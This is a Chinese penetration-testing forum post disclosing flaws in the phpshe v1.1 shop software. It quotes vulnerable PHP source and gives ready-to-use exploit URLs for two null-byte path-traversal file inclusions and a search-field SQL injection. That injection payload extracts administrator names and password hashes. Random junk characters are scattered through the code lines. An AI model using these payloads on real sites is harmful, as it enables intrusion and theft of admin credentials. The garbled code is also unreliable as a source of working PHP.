找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 2674|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/5 Y! A0 \/ a0 ^# I  M
/* Phpshe v1.1 Vulnerability
/ c2 E2 ~; S* B/* ========================9 Q: d* B4 K( L) z% c5 @
/* By: : Kn1f3
" s  [0 {% C" D/ n1 Q% a0 N/* E-Mail : 681796@qq.com
. a$ X; ?- Q# p  u2 h) B/*******************************************************/9 }9 p/ p8 P; V1 ^* B1 c; V5 D; X+ U
0×00 整体大概参数传输
/ E0 d7 i: |2 K% |2 E
* x7 p& a9 z6 i5 ~( u( \5 A( l- X3 n- r8 A8 f
1 f( ?# t, y4 ~2 V- W0 t
//common.php
" t% ]; k/ I) M& Tif (get_magic_quotes_gpc()) {! J. b( V+ u5 \
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
/ v% V$ L; O' L! \! F0 A& E!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');1 ~5 [9 X* ]' ^) V! j) P
}% M7 x) d1 {: x" T" q
else {) J3 K* A6 M2 C0 T
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
7 I9 G) i4 {% [  ^; Q5 v0 i!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');0 {+ j2 E$ x/ m, `
}: o" h# |* F1 `1 W5 u* ?; N6 x
session_start();
& U4 m9 t3 y! u; {* R6 m!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
0 t+ O5 T* e  s( l% B. o5 b!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
, S2 u7 J9 s+ I4 ]' Q5 U* Y
$ Q) F* f2 v* ?+ o, C- \0×01 包含漏洞
: o: S. ^( R6 U1 N
" L) A8 |2 w5 H& @* p& p- D0 l8 V! p1 j
//首页文件/ \' N! s7 C+ x# G' s+ G/ d
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);$ E4 \4 @1 S4 l7 y4 R! t
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
6 v  u" D# M$ m9 T* j' l& s9 Qpe_result();
; o( l7 D0 a2 c, L?>! K' M( |4 F: y1 G4 D$ c+ X
//common 文件 第15行开始" |6 `2 b" L8 Q/ v
url路由配置
  z0 k( I7 M  o$module = $mod = $act = 'index';
" _- p- [: k, J9 q$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
9 s, L! w) L' L7 Z) t, }# p- {$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
2 l0 q/ w. y0 b6 R% `% l$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);" |' c$ a( C' M9 f1 k! U) a# `; Z% C
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00# }0 s. ^$ z! P4 e2 ^" I  O

" ?, V' ]  g9 B+ C9 w

& z% e" N/ |2 A( |' r 0×02 搜索注入4 ~* b$ D3 l. G4 t7 z; n
8 X, \0 E' P$ p, p* w) `
<code id="code2">

//product.php文件$ G1 U* V0 X$ Y3 a8 x4 L( t
case 'list':# d& L+ r+ l8 H. R7 I% M! e
$category_id = intval($id);
5 G, h) }, H! \9 ~# [- l$info = $db->pe_select('category', array('category_id'=>$category_id));
# X8 f+ D0 z: J5 Z//搜索# C5 u! v9 W% m+ K' ?( W9 j5 ~
$sqlwhere = " and `product_state` = 1";
' S# i' ?6 h& [/ S; _- epe_lead('hook/category.hook.php');
' G7 V# i( s7 [$ |' ~if ($category_id) {* j4 }+ U3 D1 ]8 N! c. a
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";/ G  k7 {8 F6 d4 k/ B2 g
}
; `: M: b) h7 V) _4 b" D, Z5 Z$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤0 \* C* E/ W- G
if ($_g_orderby) {
- I. K3 Z; g9 u& N) M6 n$orderby = explode('_', $_g_orderby);# i. d8 u) f, p; u4 A: e' z/ V
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
1 f# O0 p5 F7 E% J}
( n$ a) }7 N% T' R4 o* H6 @else {
4 e, ?0 B4 a+ U. ~, _; C, T$sqlwhere .= " order by `product_id` desc";: M3 s1 w9 U8 m, L% e/ d
}+ Y7 M- `8 P6 s# f1 ]# }7 ]
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));5 v* t$ _0 r/ b8 Y% p" z3 g/ P
//热卖排行' p- \: J$ j: u9 n6 _( n
$product_hotlist = product_hotlist();  h8 m9 u/ r7 u/ I# b1 p7 P
//当前路径
* e; p$ `6 v: p' m/ B/ F$nowpath = category_path($category_id);
4 O1 H( H0 N  F2 Z: I$seo = pe_seo($info['category_name']);
  G* _; |" z* ]8 a3 Vinclude(pe_tpl('product_list.html'));9 I/ H. H* v* Y' U! q
//跟进selectall函数库  U4 T4 s" A1 g5 N+ p2 T. ]1 B
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())0 f! b8 ^6 t8 ~: n' T7 w  L
{
9 }, ^1 Y1 ]# x- P7 O, P1 f4 A//处理条件语句, \0 U2 V) D. ^) Y7 L( Z
$sqlwhere = $this->_dowhere($where);
. s" w8 p1 {0 [8 q  G  |return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
2 L8 i7 i) J) w3 y$ ]}0 I( w) _, u- r9 B3 S. S4 U& R1 M8 k: D
//exp
8 R  v5 C0 ^) O4 ^) N8 H/ I2 kproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1# U3 u: y" y4 c  y

</code>
' F! K, }2 k9 I $ p4 `; Q: b9 X* |2 S7 ]7 E' w, b3 Z
0×03 包含漏洞2$ J# g' `" O; q4 V

3 @$ V- |, O3 g$ ]' [<code id="code3">

//order.php

case 'pay':

* N1 j' z. i8 `, }
$order_id = pe_dbhold($_g_id);

& q! E0 H+ T! S% ^, `  ?! c
$cache_payway = cache::get('payway');


4 y9 c0 U5 G  a/ M( w4 q9 ?foreach($cache_payway as $k => $v) {

/ J# ^% N  k2 ]) p9 |9 U+ m
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

+ \: N8 {* ^, E
if ($k == 'bank') {

# f0 o$ \6 f0 i6 B. G
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


# o( h* T2 C! s9 f) B}

7 r, ]2 k  w9 \, R7 Q  u. J: T! E( s
}


" \9 J. i* I  w$ r$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

/ F+ Z6 ^" [8 U) S4 e/ {# Z; p6 K
!$order['order_id'] && pe_error('订单号错误...');


# X/ s7 l( c1 f3 h' {if (isset($_p_pesubmit)) {


) g% i  f, g% C0 ?if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


! S: l' ]9 m7 l3 l% z, C$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

& e) @. b% T2 ]- q
foreach ($info_list as $v) {

, m8 D6 y9 z$ o7 E
$order['order_name'] .= "{$v['product_name']};";4 _" v: V' g& g" Y* c; G7 \" ^. m* z

6 p! V- U; y6 c2 b
}


, k- i9 x' m0 recho '正在为您连接支付网站,请稍后...';


; r3 n; n* |% r8 z( `; Oinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

3 `6 l0 W) r: h$ x- a6 z! g, `' g
}//当一切准备好的时候就可以进行"鸡肋包含了"


  B6 w4 K  Y3 s2 z# H  belse {


7 q, H# T( u0 P, ?7 a8 kpe_error('支付错误...');

4 n/ k6 n2 O/ }5 C/ l
}


* c: _* D6 d. j6 f}


0 R  v: z0 t3 }, \* B" h$seo = pe_seo('选择支付方式');

, q5 p% n" w6 C) v5 g
include(pe_tpl('order_pay.html'));


/ o* u  F6 A- Q; Hbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>  U0 E- p) l$ y
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表